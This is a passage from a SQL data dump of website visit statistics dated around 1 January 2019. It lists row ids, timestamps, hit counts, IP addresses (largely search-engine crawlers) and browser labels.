2,2,0,0,'8.29.198.25','other'),(363385,1546355683,2,2,0,0,'66.249.66.154','chrome'),(363386,1546355712,1,1,0,0,'66.249.66.44','chrome'),(363387,1546355729,1,1,0,0,'207.46.13.54','other'),(363388,1546355731,1,1,0,0,'54.36.148.62','other'),(363389,1546355900,1,1,0,0,'54.36.148.170','other'),(363390,1546355920,4,4,0,0,'216.244.66.241','other'),(363391,1546356004,1,1,0,0,'66.249.66.157','chrome'),(363392,1546356005,1,1,0,0,'66.249.66.156','chrome'),(363393,1546356009,1,1,0,0,'66.249.66.155','chrome'),(363394,1546356030,1,1,0,0,'46.229.168.150','other'),(363395,1546356303,7,7,0,0,'178.154.244.11','other'),(363396,1546356357,2,2,0,0,'5.45.207.79','other'),(363397,1546356547,1,1,0,0,'54.36.148.63','other'),(363398,1546356563,1,1,0,0,'141.8.142.103','other'),(363399,1546356579,1,1,0,0,'54.36.148.223','other'),(363400,1546356857,1,1,0,0,'54.36.149.29','other'),(363401,1546356927,2,2,0,0,'216.244.66.241','other'),(363402,1546356982,4,4,0,0,'5.45.207.19','other'),(363403,1546357128,1,1,0,0,'66.249.66.42','chrome'),(363404,1546357172,1,1,0,0,'141.8.142.108','other'),(363405,1546357179,1,1,0,0,'54.36.149.101','other'),(363406,1546357477,1,1,0,0,'54.36.148.163','other'),(363407,1546357668,1,1,0,0,'54.36.149.68','other'),(363408,1546357726,1,1,0,0,'54.36.148.212','other'),(363409,1546357747,1,1,0,0,'54.36.149.57','other'),(363410,1546357866,2,2,0,0,'46.211.119.163','chrome'),(363411,1546357870,1,1,0,0,'95.163.255.112','other'),(363412,1546357877,1,1,0,0,'95.163.255.106','other'),(363413,1546357884,1,1,0,0,'95.163.255.119','other'),(363414,1546357890,1,1,0,0,'95.163.255.103','other'),(363415,1546357896,1,1,0,0,'95.163.255.113','other'),(363416,1546357902,1,1,0,0,'95.163.255.114','other'),(363417,1546357927,2,2,0,0,'216.244.66.241','other'),(363418,1546358254,1,1,0,0,'54.36.148.23','other'),(363419,1546358466,1,1,0,0,'54.36.148.94','other'),(363420,1546358541,1,1,0,0,'180.76.15.156','other'),(363421,1546358542,1,1,0,0,'180.76.15.143','other'),(363422,1546358678,1,1,0,0,'95.163.255.178','other'),(363423,1546358682,1,1,0,0,'95.163.255.164','other'),(363424,1546358694,1,1,0,0,'66.249.66.156','chrome'),(363425,1546358697,1,1,0,0,'66.249.66.152','chrome'),(363426,1546358822,1,1,0,0,'54.36.148.34','other'),(363427,1546358872,12,12,0,0,'216.244.66.241','other'),(363428,1546358929,1,1,0,0,'54.36.148.173','other'),(363429,1546359230,1,1,0,0,'54.36.148.227','other'),(363430,1546359415,1,1,0,0,'54.36.148.69','other'),(363431,1546360047,1,1,0,0,'66.249.66.157','chrome'),(363432,1546360274,1,1,0,0,'66.249.66.152','chrome'),(363433,1546360450,1,1,0,0,'46.229.168.135','other'),(363434,1546360465,1,1,0,0,'54.36.149.14','other'),(363435,1546360921,1,1,0,0,'46.229.168.134','other'),(363436,1546360923,1,1,0,0,'46.229.168.132','other'),(363437,1546360987,1,1,0,0,'54.36.148.74','other'),(363438,1546361139,1,1,0,0,'54.36.149.47','other'),(363439,1546361716,5,5,0,0,'216.244.66.241','other'),(363440,1546361743,1,1,0,0,'54.36.148.198','other'),(363441,1546361886,1,1,0,0,'54.36.149.7','other'),(363442,1546361893,1,1,0,0,'54.36.148.131','other'),(363443,1546361942,1,1,0,0,'54.36.148.216','other'),(363444,1546362033,1,1,0,0,'46.229.168.146','other'),(363445,1546362407,1,1,0,0,'54.36.149.30','other'),(363446,1546362431,1,1,0,0,'54.36.149.82','other'),(363447,1546362488,1,1,0,0,'54.36.148.208','other'),(363448,1546362553,1,1,0,0,'85.21.233.180','other'),(363449,1546362614,1,1,0,0,'54.36.148.92','other'),(363450,1546362628,1,1,0,0,'54.36.148.55','other'),(363451,1546362772,1,1,0,0,'54.36.148.237','other'),(363452,1546362878,1,1,0,0,'91.196.178.94','chrome'),(363453,1546363318,1,1,0,0,'95.163.255.153','other'),(363454,1546363321,1,1,0,0,'95.163.255.190','other'),(363455,1546363513,1,1,0,0,'54.36.149.73','other'),(363456,1546364129,1,1,0,0,'40.77.167.128','other'),(363457,1546364464,5,5,0,0,'216.244.66.241','other'),(363458,1546364728,1,1,0,0,'66.249.66.155','chrome'),(363459,1546364729,1,1,0,0,'66.249.66.156','chrome'),(363460,1546364757,1,1,0,0,'5.196.87.34','other'),(363461,1546364902,1,1,0,0,'46.229.168.147','other'),(363462,1546364969,2,2,0,0,'5.45.207.19','other'),(363463,1546365041,1,1,0,0,'54.36.148.106','other'),(363464,1546365545,3,3,0,0,'216.244.66.241','other'),(363465,1546365554,2,2,0,0,'5.45.207.79','other'),(363466,1546365748,1,1,0,0,'157.55.39.111','other'),(363467,1546365774,1,1,0,0,'46.229.168.138','other'),(363468,1546365880,1,1,0,0,'54.36.148.160','other'),(363469,1546365932,1,1,0,0,'54.36.149.41','other'),(363470,1546365938,1,1,0,0,'5.45.207.19','other'),(363471,1546365941,2,2,0,0,'178.154.244.11','other'),(363472,1546366361,2,2,0,0,'8.29.198.27','other'),(363473,1546366459,1,1,0,0,'40.77.167.34','other'),(363474,1546366519,1,1,0,0,'54.36.148.154','other'),(363475,1546366712,1,1,0,0,'66.249.66.42','chrome'),(363476,1546366797,1,1,0,0,'94.244.163.6','chrome'),(363477,1546366885,1,1,0,0,'51.255.65.46','other'),(363478,1546366904,1,1,0,0,'54.36.148.219','other'),(363479,1546367076,1,1,0,0,'54.36.148.242','other'),(363480,1546367099,1,1,0,0,'54.36.148.252','other'),(363481,1546367316,3,3,0,0,'216.244.66.241','other'),(363482,1546367459,1,1,0,0,'54.36.148.54','other'),(363483,1546367714,1,1,0,0,'54.36.148.43','other'),(363484,1546367743,1,1,0,0,'54.36.148.175','other'),(363485,1546367771,1,1,0,0,'54.36.148.129','other'),(363486,1546367910,1,1,0,0,'54.36.149.27','other'),(363487,1546368073,1,1,0,0,'54.36.148.224','other'),(363488,1546368096,1,1,0,0,'46.229.168.132','other'),(363489,1546368412,1,1,0,0,'54.36.148.247','other'),(363490,1546368479,1,1,0,0,'216.244.66.241','other'),(363491,1546368700,1,1,0,0,'66.249.66.152','chrome'),(363492,1546368907,1,1,0,0,'54.36.148.108','other'),(363493,1546368926,2,2,0,0,'66.249.66.156','chrome'),(363494,1546369236,1,1,0,0,'46.229.168.142','other'),(363495,1546369441,1,1,0,0,'54.36.148.244','other'),(363496,1546369494,1,1,0,0,'54.36.148.52','other'),(363497,1546369552,2,2,0,0,'157.55.39.111','other'),(363498,1546369582,3,3,0,0,'157.55.39.58','other'),(363499,1546369595,1,1,0,0,'157.55.39.57','other'),(363500,1546369634,6,6,0,0,'40.77.167.34','other'),(363501,1546369719,1,1,0,0,'54.36.148.57','other'),(363502,1546369762,1,1,0,0,'46.229.168.150','other'),(363503,1546369846,1,1,0,0,'54.36.148.161','other'),(363504,1546370087,64,64,0,0,'207.180.225.4','other'),(363505,1546370160,7,7,0,0,'216.244.66.241','other'),(363506,1546370239,1,1,0,0,'66.249.66.155','chrome'),(363507,1546370240,1,1,0,0,'66.249.66.154','chrome'),(363508,1546370385,7,7,0,0,'207.180.242.15','other'),(363509,1546370985,1,1,0,0,'95.163.255.161','other'),(363510,1546370988,1,1,0,0,'95.163.255.183','other'),(363511,1546371084,2,2,0,0,'216.244.66.241','other'),(363512,1546371301,1,1,0,0,'37.9.113.20','other'),(363513,1546371653,1,1,0,0,'54.36.148.80','other'),(363514,1546371895,1,1,0,0,'46.229.168.130','other'),(363515,1546371970,1,1,0,0,'157.55.39.57','other'),(363516,1546372204,1,1,0,0,'54.36.148.230','other'),(363517,1546372284,1,1,0,0,'54.36.148.19','other'),(363518,1546372800,1,1,0,0,'54.36.149.58','other'),(363519,1546373016,11,11,0,0,'216.244.66.241','other'),(363520,1546373026,1,1,0,0,'54.36.149.104','other'),(363521,1546373112,1,1,0,0,'46.229.168.136','other'),(363522,1546373303,1,1,0,0,'54.36.148.122','other'),(363523,1546373489,2,2,0,0,'37.54.114.236','chrome'),(363524,1546373837,1,1,0,0,'54.36.149.67','other'),(363525,1546374016,1,1,0,0,'54.36.148.77','other'),(363526,1546374400,1,1,0,0,'141.8.142.103','other'),(363527,1546375234,1,1,0,0,'5.45.207.79','other'),(363528,1546375294,2,2,0,0,'95.108.213.4','other'),(363529,1546375405,2,2,0,0,'5.45.207.19','other'),(363530,1546375618,1,1,0,0,'141.8.142.103','other'),(363531,1546375679,1,1,0,0,'180.76.15.18','other'),(363532,1546375680,1,1,0,0,'180.76.15.140','other'),(363533,1546375748,1,1,0,0,'46.211.10.115','chrome'),(363534,1546375763,1,1,0,0,'54.36.148.114','other'),(363535,1546375793,1,1,0,0,'178.154.244.11','other'),(363536,1546375819,1,1,0,0,'54.36.148.17','other'),(363537,1546375838,6,6,0,0,'216.244.66.241','other'),(363538,1546376036,1,1,0,0,'54.36.149.64','other'),(363539,1546376130,1,1,0,0,'54.36.148.173','other'),(363540,1546376138,1,1,0,0,'95.163.255.165','other'),(363541,1546376303,1,1,0,0,'46.229.168.129','other'),(363542,1546376441,1,1,0,0,'54.36.148.104','other'),(363543,1546376454,1,1,0,0,'54.36.148.35','other'),(363544,1546376456,1,1,0,0,'66.249.66.157','chrome'),(363546,1546376651,1,1,0,0,'207.46.13.187','other'),(363547,1546376718,1,1,0,0,'95.163.255.171','other'),(363548,1546376722,1,1,0,0,'95.163.255.180','other'),(363549,1546376876,1,1,0,0,'54.36.148.90','other'),(363550,1546376954,1,1,0,0,'141.8.142.103','other'),(363551,1546377144,1,1,0,0,'54.36.148.174','other'),(363552,1546377209,1,1,0,0,'8.29.198.27','other'),(363553,1546377523,2,2,0,0,'216.244.66.241','other'),(363554,1546377557,1,1,0,0,'54.36.148.22','other'),(363555,1546377742,1,1,0,0,'5.188.210.53','chrome'),(363556,1546377898,1,1,0,0,'46.229.168.150','other'),(363557,1546378065,1,1,0,0,'8.29.198.26','other'),(363558,1546378247,1,1,0,0,'54.36.148.182','other'),(363559,1546378286,1,1,0,0,'66.249.66.40','chrome'),(363560,1546378492,1,1,0,0,'54.36.149.35','other'),(363561,1546378704,10,10,0,0,'216.244.66.241','other'),(363562,1546378844,1,1,0,0,'54.36.148.184','other'),(363563,1546378882,4,4,0,0,'5.58.25.185','chrome'),(363564,1546379114,1,1,0,0,'5.45.207.79','other'),(363565,1546379147,2,2,0,0,'54.36.148.90','other'),(363566,1546379150,1,1,0,0,'54.36.148.180','other'),(363567,1546379262,1,1,0,0,'54.36.149.87','other'),(363568,1546379442,1,1,0,0,'54.36.148.242','other'),(363569,1546379560,1,1,0,0,'54.36.149.4','other'),(363570,1546379693,1,1,0,0,'54.36.148.36','other'),(363571,1546379701,2,2,0,0,'216.244.66.241','other'),(363572,1546379909,1,1,0,0,'54.36.148.51','other'),(363573,1546379984,1,1,0,0,'54.36.148.184','other'),(363574,1546379996,1,1,0,0,'54.36.148.52','other'),(363575,1546380001,1,1,0,0,'66.249.66.42','chrome'),(363576,1546380003,1,1,0,0,'54.36.149.37','other'),(363577,1546380087,1,1,0,0,'66.249.66.40','chrome'),(363578,1546380168,1,1,0,0,'54.36.148.126','other'),(363579,1546380389,1,1,0,0,'54.36.148.207','other'),(363580,1546380488,1,1,0,0,'54.36.148.247','other'),(363581,1546380821,1,1,0,0,'46.229.168.136','other'),(363582,1546380941,1,1,0,0,'54.36.148.108','other'),(363583,1546380944,1,1,0,0,'54.36.148.175','other'),(363584,1546381332,1,1,0,0,'54.36.148.234','other'),(363585,1546381356,1,1,0,0,'88.99.2.203','other'),(363586,1546381517,1,1,0,0,'54.36.148.105','other'),(363587,1546381525,6,6,0,0,'216.244.66.241','other'),(363588,1546381719,2,2,0,0,'66.249.66.152','chrome'),(363589,1546381729,1,1,0,0,'66.249.66.154','chrome'),(363590,1546381772,1,1,0,0,'66.249.66.156','chrome'),(363591,1546382670,1,1,0,0,'54.36.148.73','other'),(363592,1546383346,1,1,0,0,'54.36.149.42','other'),(363593,1546383361,1,1,0,0,'54.36.148.182','other'),(363594,1546383442,1,1,0,0,'54.36.149.9','other'),(363595,1546383566,1,1,0,0,'207.46.13.187','other'),(363596,1546383698,1,1,0,0,'54.36.148.211','other'),(363597,1546383806,1,1,0,0,'54.36.148.167','other'),(363598,1546383974,1,1,0,0,'54.36.148.203','other'),(363599,1546384142,1,1,0,0,'54.36.148.83','other'),(363600,1546384147,1,1,0,0,'54.36.148.22','other'),(363601,1546384166,1,1,0,0,'54.36.148.117','other'),(363602,1546384232,1,1,0,0,'54.36.149.7','other'),(363603,1546384365,2,2,0,0,'216.244.66.241','other'),(363604,1546384639,1,1,0,0,'54.36.149.42','other'),(363605,1546384768,1,1,0,0,'54.36.148.240','other'),(363606,1546384844,1,1,0,0,'54.36.148.207','other'),(363607,1546384995,2,2,0,0,'52.53.201.78','chrome'),(363608,1546385269,1,1,0,0,'54.36.149.22','other'),(363609,1546385275,1,1,0,0,'54.36.148.11','other'),(363610,1546386134,1,1,0,0,'46.229.168.141','other'),(363611,1546386136,1,1,0,0,'46.229.168.154','other'),(363612,1546386140,5,5,0,0,'178.154.244.11','other'),(363613,1546386144,3,3,0,0,'5.45.207.19','other'),(363614,1546386341,2,2,0,0,'5.45.207.79','other'),(363615,1546386486,4,4,0,0,'141.8.142.103','other'),(363616,1546386630,1,1,0,0,'54.36.148.133','other'),(363617,1546386633,1,1,0,0,'54.36.148.35','other'),(363618,1546386856,2,2,0,0,'91.196.178.39','chrome'),(363619,1546386978,1,1,0,0,'87.250.224.47','other'),(363620,1546387030,1,1,0,0,'5.255.253.16','other'),(363621,1546387038,1,1,0,0,'66.249.66.44','chrome'),(363623,1546387212,6,6,0,0,'216.244.66.241','other'),(363624,1546387374,1,1,0,0,'54.36.148.71','other'),(363625,1546387496,2,2,0,0,'95.213.141.126','opera'),(363626,1546387969,2,2,0,0,'157.55.39.57','other'),(363627,1546388045,1,1,0,0,'8.29.198.26','other'),(363628,1546388052,1,1,0,0,'54.36.148.161','other'),(363629,1546388081,1,1,0,0,'46.229.168.148','other'),(363630,1546388270,1,1,0,0,'54.36.148.224','other'),(363631,1546388556,1,1,0,0,'88.99.2.203','other'),(363632,1546388557,1,1,0,0,'54.36.148.39','other'),(363633,1546388759,1,1,0,0,'54.36.149.63','other'),(363634,1546388831,1,1,0,0,'54.36.148.83','other'),(363635,1546388899,1,1,0,0,'8.29.198.27','other'),(363636,1546388919,1,1,0,0,'66.249.66.44','chrome'),(363637,1546388939,1,1,0,0,'54.36.149.42','other'),(363638,1546389191,1,1,0,0,'46.229.168.154','other'),(363639,1546389271,1,1,0,0,'95.108.213.4','other'),(363640,1546389487,1,1,0,0,'157.55.39.57','other'),(363641,1546389708,1,1,0,0,'54.36.149.35','other'),(363642,1546389788,1,1,0,0,'54.36.149.8','other'),(363643,1546390075,1,1,0,0,'54.36.149.52','other'),(363644,1546390175,4,4,0,0,'216.244.66.241','other'),(363645,1546390242,1,1,0,0,'54.36.148.139','other'),(363646,1546390254,1,1,0,0,'54.36.149.64','other'),(363647,1546390269,1,1,0,0,'54.36.148.12','other'),(363648,1546390316,1,1,0,0,'54.36.149.80','other'),(363649,1546390600,2,2,0,0,'5.45.207.19','other'),(363650,1546390606,1,1,0,0,'185.220.101.6','other'),(363651,1546390626,1,1,0,0,'185.220.101.9','other'),(363652,1546390732,1,1,0,0,'54.36.148.13','other'),(363653,1546390954,2,2,0,0,'46.229.168.146','other'),(363654,1546390961,1,1,0,0,'46.229.168.130','other'),(363655,1546391491,1,1,0,0,'66.249.66.154','chrome'),(363656,1546391516,1,1,0,0,'178.154.244.11','other'),(363657,1546391557,2,2,0,0,'95.163.255.65','other'),(363658,1546391559,2,2,0,0,'207.46.13.187','other'),(363659,1546391619,1,1,0,0,'54.36.148.75','other'),(363660,1546391665,1,1,0,0,'54.36.148.232','other'),(363661,1546392171,1,1,0,0,'46.229.168.154','other'),(363662,1546392527,1,1,0,0,'54.36.148.182','other'),(363663,1546392951,5,5,0,0,'216.244.66.241','other'),(363664,1546393071,2,2,0,0,'46.229.168.143','other'),(363665,1546393502,1,1,0,0,'54.36.149.44','other'),(363666,1546393693,2,2,0,0,'40.77.167.136','other'),(363667,1546393759,1,1,0,0,'54.36.148.49','other'),(363668,1546393965,3,3,0,0,'216.244.66.241','other'),(363669,1546394605,1,1,0,0,'54.36.149.41','other'),(363670,1546394733,2,2,0,0,'18.237.206.129','chrome'),(363671,1546394740,1,1,0,0,'46.229.168.154','other'),(363672,1546395118,1,1,0,0,'95.163.255.95','other'),(363673,1546395122,1,1,0,0,'95.163.255.94','other'),(363674,1546395342,1,1,0,0,'46.229.168.137','other'),(363675,1546395385,2,2,0,0,'46.229.168.148','other'),(363676,1546395466,1,1,0,0,'46.229.168.152','other'),(363677,1546395682,1,1,0,0,'54.36.148.188','other'),(363678,1546395769,2,2,0,0,'78.26.130.63','firefox'),(363679,1546395851,3,3,0,0,'216.244.66.241','other'),(363680,1546395902,1,1,0,0,'54.36.149.75','other'),(363681,1546395943,2,2,0,0,'178.154.244.11','other'),(363682,1546396083,1,1,0,0,'141.8.142.103','other'),(363683,1546396114,2,2,0,0,'40.77.167.136','other'),(363684,1546396122,1,1,0,0,'54.36.148.189','other'),(363685,1546396123,1,1,0,0,'54.36.149.43','other'),(363686,1546396141,1,1,0,0,'54.36.148.231','other'),(363687,1546396477,1,1,0,0,'54.36.149.25','other'),(363688,1546396699,1,1,0,0,'54.36.148.111','other'),(363689,1546396715,3,3,0,0,'157.55.39.57','other'),(363690,1546396719,1,1,0,0,'178.154.244.49','other'),(363691,1546396946,1,1,0,0,'54.36.148.224','other'),(363692,1546397043,1,1,0,0,'46.229.168.154','other'),(363693,1546397058,1,1,0,0,'95.108.213.4','other'),(363694,1546397228,1,1,0,0,'95.163.255.180','other'),(363695,1546397298,3,3,0,0,'40.77.167.34','other'),(363696,1546397350,1,1,0,0,'54.36.149.5','other'),(363697,1546397378,2,2,0,0,'54.36.149.70','other'),(363698,1546397463,1,1,0,0,'95.163.255.96','other'),(363699,1546397489,1,1,0,0,'95.163.255.94','other'),(363700,1546397808,1,1,0,0,'54.36.148.102','other'),(363701,1546398057,1,1,0,0,'54.36.149.78','other'),(363702,1546398533,1,1,0,0,'54.36.148.200','other'),(363703,1546398640,6,6,0,0,'216.244.66.241','other'),(363704,1546398871,1,1,0,0,'8.29.198.26','other'),(363705,1546399107,1,1,0,0,'40.77.167.136','other'),(363706,1546399266,1,1,0,0,'54.36.149.107','other'),(363707,1546399298,1,1,0,0,'54.36.148.105','other'),(363708,1546399511,1,1,0,0,'54.36.148.66','other'),(363709,1546399589,1,1,0,0,'46.229.168.148','other'),(363710,1546399727,1,1,0,0,'216.244.66.241','other'),(363711,1546399740,1,1,0,0,'8.29.198.27','other'),(363712,1546399926,1,1,0,0,'54.36.148.45','other'),(363713,1546400070,1,1,0,0,'46.229.168.137','other'),(363714,1546400076,1,1,0,0,'46.229.168.144','other'),(363715,1546400103,1,1,0,0,'54.36.148.47','other'),(363716,1546400602,2,2,0,0,'95.108.213.4','other'),(363717,1546400606,1,1,0,0,'46.229.168.147','other'),(363718,1546400681,1,1,0,0,'54.36.148.71','other'),(363719,1546400816,1,1,0,0,'95.163.255.97','other'),(363720,1546400819,1,1,0,0,'95.163.255.98','other'),(363721,1546401040,1,1,0,0,'54.36.148.73','other'),(363722,1546401046,1,1,0,0,'54.36.148.148','other'),(363723,1546401063,1,1,0,0,'66.249.66.155','chrome'),(363724,1546401064,1,1,0,0,'66.249.66.154','chrome'),(363725,1546401241,1,1,0,0,'54.36.149.100','other'),(363726,1546401371,1,1,0,0,'40.77.167.136','other'),(363727,1546401411,1,1,0,0,'46.229.168.141','other'),(363728,1546401415,4,4,0,0,'216.244.66.241','other'),(363729,1546401790,1,1,0,0,'141.8.142.103','other'),(363730,1546401914,1,1,0,0,'157.55.39.57','other'),(363731,1546402099,1,1,0,0,'54.36.148.210','other'),(363732,1546402258,1,1,0,0,'5.45.207.19','other'),(363733,1546402273,2,2,0,0,'5.45.207.79','other'),(363734,1546402291,2,2,0,0,'178.154.244.11','other'),(363735,1546402302,1,1,0,0,'54.36.148.195','other'),(363736,1546402370,1,1,0,0,'54.36.148.254','other'),(363737,1546402581,1,1,0,0,'54.36.148.59','other'),(363738,1546402960,1,1,0,0,'94.180.151.80','other'),(363739,1546403110,1,1,0,0,'46.229.168.147','other'),(363740,1546403169,1,1,0,0,'66.102.8.190','other'),(363741,1546403176,2,2,0,0,'66.102.8.190','chrome'),(363742,1546403177,4,4,0,0,'66.102.8.186','chrome'),(363743,1546403188,2,2,0,0,'66.102.6.145','chrome'),(363744,1546403190,3,3,0,0,'66.102.6.148','chrome'),(363745,1546403197,4,4,0,0,'66.102.6.148','other'),(363746,1546403203,1,1,0,0,'66.249.83.42','other'),(363747,1546403212,3,3,0,0,'66.102.6.150','chrome'),(363748,1546403214,1,1,0,0,'66.249.83.59','chrome'),(363750,1546403224,2,2,0,0,'66.102.8.163','chrome'),(363751,1546403225,1,1,0,0,'66.102.8.188','chrome'),(363752,1546403245,1,1,0,0,'66.102.6.10','chrome'),(363753,1546403309,1,1,0,0,'40.77.167.138','other'),(363754,1546403357,3,3,0,0,'66.102.8.188','other'),(363755,1546403367,2,2,0,0,'66.249.84.126','chrome'),(363756,1546403448,1,1,0,0,'66.249.83.218','chrome'),(363757,1546403471,2,2,0,0,'66.249.84.124','other'),(363758,1546403687,1,1,0,0,'141.8.142.103','other'),(363759,1546403699,1,1,0,0,'66.249.84.12','other'),(363760,1546403751,1,1,0,0,'66.102.6.149','chrome'),(363761,1546403878,1,1,0,0,'46.229.168.133','other'),(363762,1546403889,3,3,0,0,'66.249.83.220','chrome'),(363763,1546403978,3,3,0,0,'66.102.6.149','other'),(363764,1546404014,1,1,0,0,'66.102.6.142','chrome'),(363765,1546404083,1,1,0,0,'46.229.168.138','other'),(363766,1546404128,1,1,0,0,'54.36.148.247','other'),(363767,1546404171,1,1,0,0,'66.102.6.148','other'),(363768,1546404273,3,3,0,0,'216.244.66.241','other'),(363769,1546404369,1,1,0,0,'66.102.8.166','chrome'),(363770,1546404370,1,1,0,0,'66.102.8.186','chrome'),(363771,1546404410,1,1,0,0,'66.249.83.40','other'),(363772,1546404416,1,1,0,0,'66.102.6.10','other'),(363773,1546404420,2,2,0,0,'66.249.84.126','other'),(363774,1546404455,2,2,0,0,'66.102.6.8','chrome'),(363775,1546404491,1,1,0,0,'54.36.148.41','other'),(363776,1546404532,1,1,0,0,'54.36.148.187','other'),(363777,1546404570,1,1,0,0,'66.102.6.8','other'),(363778,1546404589,1,1,0,0,'66.249.84.96','chrome'),(363779,1546404599,1,1,0,0,'66.102.8.168','other'),(363780,1546404616,1,1,0,0,'40.77.167.140','other'),(363781,1546404624,1,1,0,0,'66.249.83.220','other'),(363782,1546404626,1,1,0,0,'66.102.6.12','chrome'),(363783,1546404639,1,1,0,0,'66.102.8.190','other'),(363784,1546404725,1,1,0,0,'66.102.6.150','other'),(363785,1546405058,1,1,0,0,'54.36.149.51','other'),(363786,1546405201,2,2,0,0,'216.244.66.241','other'),(363787,1546405316,1,1,0,0,'54.36.149.29','other'),(363788,1546405463,1,1,0,0,'46.229.168.133','other'),(363789,1546405701,1,1,0,0,'46.229.168.151','other'),(363790,1546405717,1,1,0,0,'54.36.148.51','other'),(363791,1546405873,1,1,0,0,'54.36.148.79','other'),(363792,1546405943,1,1,0,0,'66.249.66.154','chrome'),(363793,1546405967,2,2,0,0,'54.36.149.74','other'),(363794,1546406024,1,1,0,0,'54.36.148.255','other'),(363795,1546406066,1,1,0,0,'46.229.168.130','other'),(363796,1546406104,2,2,0,0,'216.244.66.241','other'),(363797,1546406511,1,1,0,0,'54.36.149.32','other'),(363798,1546406634,1,1,0,0,'54.36.148.51','other'),(363799,1546406770,1,1,0,0,'46.229.168.142','other'),(363800,1546406954,1,1,0,0,'54.36.148.146','other'),(363801,1546407079,5,5,0,0,'216.244.66.241','other'),(363802,1546407381,1,1,0,0,'54.36.149.93','other'),(363803,1546407593,3,3,0,0,'66.249.66.156','chrome'),(363804,1546407657,1,1,0,0,'54.36.148.252','other'),(363805,1546407681,1,1,0,0,'54.36.148.16','other'),(363806,1546407734,1,1,0,0,'46.229.168.129','other'),(363807,1546407897,1,1,0,0,'157.55.39.80','other'),(363808,1546408016,1,1,0,0,'54.36.148.66','other'),(363809,1546408024,1,1,0,0,'54.36.148.119','other'),(363810,1546408176,2,2,0,0,'54.36.148.155','other'),(363811,1546408216,3,3,0,0,'216.244.66.241','other'),(363812,1546408271,2,2,0,0,'5.45.207.79','other'),(363813,1546408355,1,1,0,0,'54.36.148.157','other'),(363814,1546408514,1,1,0,0,'5.45.207.19','other'),(363815,1546408678,1,1,0,0,'54.36.149.104','other'),(363816,1546408685,1,1,0,0,'87.250.224.64','other'),(363817,1546408726,1,1,0,0,'95.108.181.54','other'),(363818,1546408758,1,1,0,0,'178.154.244.11','other'),(363819,1546408792,1,1,0,0,'178.154.200.48','other'),(363820,1546408819,2,2,0,0,'178.154.171.17','other'),(363821,1546408855,1,1,0,0,'141.8.183.23','other'),(363822,1546408857,1,1,0,0,'178.154.244.49','other'),(363823,1546408909,1,1,0,0,'54.36.148.242','other'),(363824,1546408931,2,2,0,0,'141.8.142.103','other'),(363825,1546409157,1,1,0,0,'213.180.203.23','other'),(363826,1546409191,1,1,0,0,'37.9.113.20','other'),(363827,1546409205,2,2,0,0,'185.220.102.7','other'),(363828,1546409295,1,1,0,0,'54.36.149.6','other'),(363829,1546409401,1,1,0,0,'95.108.213.4','other'),(363830,1546409402,1,1,0,0,'87.250.224.107','other'),(363831,1546409468,1,1,0,0,'54.36.148.146','other'),(363832,1546409478,1,1,0,0,'66.249.76.76','chrome'),(363833,1546409550,1,1,0,0,'54.36.148.80','other'),(363834,1546409700,2,2,0,0,'8.29.198.27','other'),(363835,1546409716,1,1,0,0,'46.229.168.149','other'),(363836,1546409718,1,1,0,0,'54.36.149.69','other'),(363837,1546409880,4,4,0,0,'216.244.66.241','other'),(363838,1546409925,1,1,0,0,'5.255.253.16','other'),(363839,1546409963,1,1,0,0,'54.36.148.176','other'),(363840,1546410017,1,1,0,0,'54.36.148.248','other'),(363841,1546410057,1,1,0,0,'213.180.203.9','other'),(363842,1546410070,1,1,0,0,'95.108.181.54','other'),(363843,1546410073,1,1,0,0,'54.36.148.48','other'),(363844,1546410304,1,1,0,0,'54.36.148.105','other'),(363845,1546410357,1,1,0,0,'95.163.255.194','other'),(363846,1546410362,1,1,0,0,'95.163.255.171','other'),(363847,1546410608,1,1,0,0,'54.36.149.2','other'),(363848,1546410782,1,1,0,0,'157.55.39.57','other'),(363849,1546410867,1,1,0,0,'54.36.149.87','other'),(363850,1546410895,1,1,0,0,'66.249.66.42','chrome'),(363851,1546410974,2,2,0,0,'216.244.66.241','other'),(363852,1546411086,2,2,0,0,'91.196.178.69','firefox'),(363853,1546411115,2,2,0,0,'91.196.178.83','chrome'),(363854,1546411156,1,1,0,0,'54.36.148.129','other'),(363855,1546411348,1,1,0,0,'54.36.149.80','other'),(363856,1546411598,2,2,0,0,'54.36.148.79','other'),(363857,1546411666,1,1,0,0,'46.229.168.148','other'),(363858,1546411837,1,1,0,0,'54.36.148.46','other'),(363859,1546411963,1,1,0,0,'54.36.148.118','other'),(363860,1546412071,1,1,0,0,'188.32.254.55','chrome'),(363861,1546412531,1,1,0,0,'46.229.168.143','other'),(363862,1546412532,1,1,0,0,'46.229.168.151','other'),(363863,1546412556,1,1,0,0,'54.36.148.21','other'),(363864,1546412573,1,1,0,0,'54.36.148.163','other'),(363865,1546412644,5,5,0,0,'216.244.66.241','other'),(363866,1546412799,1,1,0,0,'54.36.148.31','other'),(363867,1546412847,4,4,0,0,'5.45.207.19','other'),(363868,1546412862,1,1,0,0,'141.8.142.103','other'),(363869,1546412868,1,1,0,0,'37.9.113.103','other'),(363870,1546413040,1,1,0,0,'157.55.39.57','other'),(363871,1546413087,1,1,0,0,'46.229.168.136','other'),(363872,1546413168,2,2,0,0,'178.154.244.11','other'),(363873,1546413236,1,1,0,0,'54.36.149.81','other'),(363874,1546413290,1,1,0,0,'54.36.149.92','other'),(363875,1546413538,1,1,0,0,'5.45.207.79','other'),(363876,1546413820,1,1,0,0,'216.244.66.241','other'),(363877,1546413962,1,1,0,0,'54.36.148.30','other'),(363878,1546414653,1,1,0,0,'178.154.244.11','other'),(363879,1546414690,1,1,0,0,'157.55.39.57','other'),(363880,1546414702,1,1,0,0,'54.36.149.58','other'),(363881,1546414849,2,2,0,0,'91.196.178.69','firefox'),(363882,1546414875,1,1,0,0,'5.45.207.79','other'),(363883,1546414979,1,1,0,0,'54.36.148.29','other'),(363884,1546415508,1,1,0,0,'54.36.148.121','other'),(363885,1546415513,2,2,0,0,'216.244.66.241','other'),(363886,1546415555,1,1,0,0,'54.36.148.120','other'),(363887,1546415993,1,1,0,0,'54.36.148.31','other'),(363888,1546416344,1,1,0,0,'54.36.148.70','other'),(363889,1546416431,1,1,0,0,'46.229.168.148','other'),(363890,1546416440,2,2,0,0,'157.55.39.57','other'),(363891,1546416928,2,2,0,0,'91.196.178.83','chrome'),(363892,1546417146,1,1,0,0,'46.229.168.141','other'),(363893,1546417211,1,1,0,0,'216.244.66.241','other'),(363894,1546417894,1,1,0,0,'37.53.123.48','chrome'),(363895,1546417919,1,1,0,0,'66.249.66.157','chrome'),(363896,1546417920,1,1,0,0,'66.249.66.152','chrome'),(363897,1546418212,1,1,0,0,'5.196.87.9','other'),(363898,1546418294,1,1,0,0,'54.36.149.55','other'),(363899,1546418404,1,1,0,0,'